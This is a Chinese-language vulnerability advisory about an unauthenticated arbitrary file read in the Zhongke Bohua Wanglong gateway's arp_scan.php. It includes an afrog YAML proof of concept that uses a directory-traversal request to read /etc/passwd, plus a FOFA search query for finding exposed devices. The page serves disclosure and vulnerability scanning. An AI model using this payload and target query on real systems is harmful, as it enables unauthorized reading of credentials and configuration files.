中科博华网龙网关 arp_scanphp 任意文件读取漏洞

漏洞信息

漏洞名称: 中科博华网龙网关 arp_scan.php 任意文件读取漏洞

漏洞类型: 文件读取

漏洞等级: 高危

漏洞描述: 中科博华网龙网关是一款企业级网络安全产品,主要用于网络边界的安全防护,包括防火墙、入侵检测等功能,广泛应用于各类企事业单位的网络环境中。该产品在安全防护方面扮演着重要角色,因此其安全性直接关系到企业网络的安全。此次发现的漏洞存在于arp_scan.php文件中,该文件未对用户输入进行严格过滤,导致攻击者可以通过构造特定的请求路径,实现任意文件读取。这种漏洞的根源在于缺乏对用户输入的有效验证和过滤,使得攻击者能够利用目录遍历技术访问系统敏感文件。攻击者利用此漏洞可以读取系统重要文件,如数据库配置文件、系统配置文件等,这些文件往往包含敏感信息,如数据库连接凭证、系统配置细节等。一旦这些信息被泄露,攻击者可以进一步利用这些信息进行更深层次的攻击,如数据库入侵、系统控制等。由于该漏洞无需身份验证即可利用,且攻击过程可以自动化进行,因此对受影响系统的安全构成了严重威胁。

产品厂商: 中科博华网龙

产品名称: 中科博华网龙网关

搜索语法: title=”博华网龙”

来源: https://github.com/zan8in/afrog/blob/1823fa1eef54086d619bb8b99776a26190f6a3c1/pocs%2Fafrog-pocs%2Fvulnerability%2Fbohuawanglong-arp-scan-fileread.yaml

类型: zan8in/afrog:github commit

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22

id: bohuawanglong-arp-scan-fileread
info:
name: 中科博华网龙网关 arp_scan.php 任意文件读取漏洞
author: Superhero
severity: high
description: |-
fofa: title="博华网龙"
中科博华网龙网关 arp_scan.php 任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
reference:
- https://mp.weixin.qq.com/s/1GaVAZLcHXVRLUPCdPnBVw
tags: bohuawanglong,fileread

rules:
r0:
request:
method: GET
path: /firewall/arp_scan.php?ifname=/../../../../../etc/passwd
expression: response.status == 200 && response.body.bcontains(b'sshd:x') && response.body.bcontains(b'/sbin/nologin')
expression: r0()



中科博华网龙网关 arp_scanphp 任意文件读取漏洞
http://example.com/2025/07/05/github_2701402399/
作者
lianccc
发布于
2025年7月5日
许可协议